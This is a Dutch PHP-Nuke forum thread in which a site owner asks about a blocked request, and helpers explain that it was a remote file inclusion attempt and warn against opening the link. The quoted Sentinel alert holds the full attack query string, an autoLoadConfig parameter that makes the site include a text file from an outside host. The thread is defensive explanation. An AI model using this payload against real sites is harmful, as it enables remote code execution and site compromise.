PHP Nuke Nederland
 
•   Home  •  Downloads  •  Your Account  •  Forums  •
PHP-Nuke Nederland: Forums

PHP-Nuke Nederland :: View topic - Geblokkeert misbruik
 Forum FAQ  •   Search   •  Memberlist  •  Usergroups   •  Register   •    •  Profile  •  Log in to check your private messages  •  Log in

 
Post new topicReply to topic
View previous topic Log in to check your private messages View next topic
Author Message
noorman
Beginner
Beginner


Joined: Jan 20, 2008
Posts: 7

PostPosted: Mon 31 Mar 2008 9:49 Reply with quoteBack to top

Ik kreeg de volgende mail in mijn inbox;

Quote:

Datum & Tijd: 2008-03-30 23:52:32 CEST GMT +0200
Geblokkeerd IP: 85.***.***.***
Gebruiker ID: Anonymous (1)
Reden: Abuse-Filter
--------------------
Gebruiker Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
Query String: www.wideloads.nl/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://hearislam.com//photos/1/mytest.txt???
Verkrijg String: www.wideloads.nl/index.php
Post String: www.wideloads.nl/index.php?autoLoadConfig=Array
Doorgestuurd Voor: none
Klant IP: none
Remote Adres: 85.***.***.***
Remote Port: 49156
Methode Verzoeken: GET
--------------------


De persoon (of computer) is dus gebanned van de website. Ik vraag mij dus af of het hier gaat om een kwaadaardig iemand of dat het een foutje is. Kan iemand mij duidelijkheid verschaffen?

Bedankt!
View user's profileSend private message
Ice_baby_Ice
Helper
Helper


Joined: Jan 22, 2007
Posts: 437
Location: Kapelle (zeeland)

PostPosted: Tue 01 Apr 2008 5:38 Reply with quoteBack to top

Quote:
Query String: www.wideloads.nl/index.php?autoLoadConfig[999][0][autoType]=include&au toLoadConfig[999][0][loadFile]=http://hearislam.com//photos/1/mytest.t xt???


Kijk maar eens aan het einde van de url. Wink
Als het een gebruiker is kun je dat zien in je admin van Sentinel. Klik daar op blocked IP's en kijk naar de ip's die geblokt zijn. Als het een gebruiker is staat er een poppetje voor. Als je daar met je cursor (muis) op gaat staan geeft ie aan welke gebruiker het is.

Normaal gesproken krijgt de gebruiker een scherm te zien waarin word aangegeven dat als de blokkering onterrecht is dat hij een mail moet sturen naar de admin. Dit doen ze over het algemeen allemaal.

Maar als je naar het einde van de url kijkt
Quote:
=http://hearislam.com//photos/1/mytest.t xt???
zie je dat de bezoeker een file wilde posten welke niet geheel voor je site bedoeld is.

Wim

_________________
Kijk ook eens op de site the-future-webdesign
View user's profileSend private messageSend e-mailVisit poster's websiteMSN Messenger
zeromechanic
Administrator
Administrator


Joined: Oct 01, 2004
Posts: 1527
Location: Emmeloord

PostPosted: Tue 01 Apr 2008 5:54 Reply with quoteBack to top

in je mail staat ook Anonymous (1)

de 1 betekent de userid,
Als het een lid van je site is, staat daar de gebruikersnaam.

In de meeste email van sentinel gaat het om onbekende gebruikers.
En is de block ook terecht.
Wat ice ook al zei, als het onterecht is zal de gebruiker zeker een email sturen.

Wat je NOOIT EN TE NIMMER moet doen is op die link klikken om te kijken wat het is.
Wie weet doelen ze daar op, en heb je dus een probleem op je PC oid.

Sentinel doet zijn werk dus echt goed, maar het kan wel eens fout gaan.

_________________
Te Lezen: Forum Regels | Te Gebruiken
View user's profileSend private messageVisit poster's website
noorman
Beginner
Beginner


Joined: Jan 20, 2008
Posts: 7

PostPosted: Tue 01 Apr 2008 9:00 Reply with quoteBack to top

Ik had al zo'n flauw vermoeden, maar zocht nog naar een bevestiging. Confused

Ik had gezien dat het een Anonymous user was, maar niet iedereen wil zich immers registreren.

Maar dat laatste had ik WEL over het hoofd gezien.... Embarassed Dat lijkt mij inderdaad geen file waar ik of de site wat aan heeft.

Dank jullie voor de uitleg. Ik ben weer wat wijzer!
View user's profileSend private message
Display posts from previous:      
 Donaties   Adverteren 
Wilt u het forum steunen, dan kunt u nu eenvoudig doneren met PayPal.
Post new topicReply to topic
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Web site powered by PHP-Nuke

All logos and trademarks in this site are property of their respective owner. The comments are property of their posters, all the rest © 2004-2008 by BlueLion.
SEO enhanced with the Sitemapper script
You can syndicate our news using the file backend.php or ultramode.txt
Powered by PHP Powered by MySQL Apache Webserver Valid robots.txt
PHP-Nuke Copyright © 2004 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Pagina rendering: 0.08 seconden


[Valid News RSS]

RSS Feeds:
[RSS 2.0 News Feed]
[RSS 2.0 Download Feed]
[RSS 2.0 Forum Feed]
[RSS 2.0 Link Feed]
:: fisubsilver shadow phpbb2 style by Daz :: PHP-Nuke theme by BlueLion ::